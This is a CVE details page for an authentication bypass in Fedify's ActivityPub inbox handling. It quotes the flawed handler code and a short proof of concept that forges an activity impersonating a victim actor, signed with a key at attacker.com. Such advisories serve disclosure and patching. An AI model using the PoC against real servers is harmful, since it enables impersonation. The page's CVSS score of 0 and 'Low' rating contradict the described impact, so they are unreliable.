What is the severity of CVE-2025-54888?

CVE-2025-54888 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2025-54888?

No known public exploits are currently available for CVE-2025-54888.

Is there a patch available for CVE-2025-54888?

Yes, patches are available for CVE-2025-54888. Check the vendor advisories for update instructions.

CVE-2025-54888 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

An authentication bypass vulnerability allows any unauthenticated attacker to impersonate any ActivityPub actor by sending forged activities signed with their own keys. Activities are processed before verifying the signing key belongs to the claimed actor, enabling complete actor impersonation across all Fedify instances

Details

The vulnerability exists in handleInboxInternal function in fedify/federation/handler.ts. The critical flaw is in the order of operations:

Line 1712: routeActivity() is called first, which processes the activity (either immediately or by adding to queue)
Line 1730: Authentication check (doesActorOwnKey) happens AFTER processing

  // fedify/federation/handler.ts:1712-1750
  const routeResult = await routeActivity({  // ← Activity processed here
    context: ctx,
    json,
    activity,
    recipient,
    inboxListeners,
    inboxContextFactory,
    inboxErrorHandler,
    kv,
    kvPrefixes,
    queue,
    span,
    tracerProvider,
  });

  if (
    httpSigKey != null && !await doesActorOwnKey(activity, httpSigKey, ctx)  // ← Auth check too late
  ) {
    // Returns 401, but activity already processed
    return new Response("The signer and the actor do not match.", {
      status: 401,
      headers: { "Content-Type": "text/plain; charset=utf-8" },
    });
  }

By the time the 401 response is returned, the malicious activity has already been processed or queued.

PoC

Create an activity claiming to be from any actor:

  const maliciousActivity = {
    "@context": "https://www.w3.org/ns/activitystreams",
    "type": "Create",
    "actor": "https://victim.example.com/users/alice",  // Impersonating victim
    "object": {
      "type": "Note",
      "content": "This is a forged message!"
    }
  }

Sign the HTTP request with attacker's key (not the victim's):

  // Sign with attacker's key: https://attacker.com/users/eve#main-key
  const signedRequest = await signRequest(request, attackerPrivateKey, attackerKeyId);

Send to any Fedify inbox - the activity will be processed despite the key mismatch.

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com

CVE-2025-54888

Summary

Details

PoC

Impact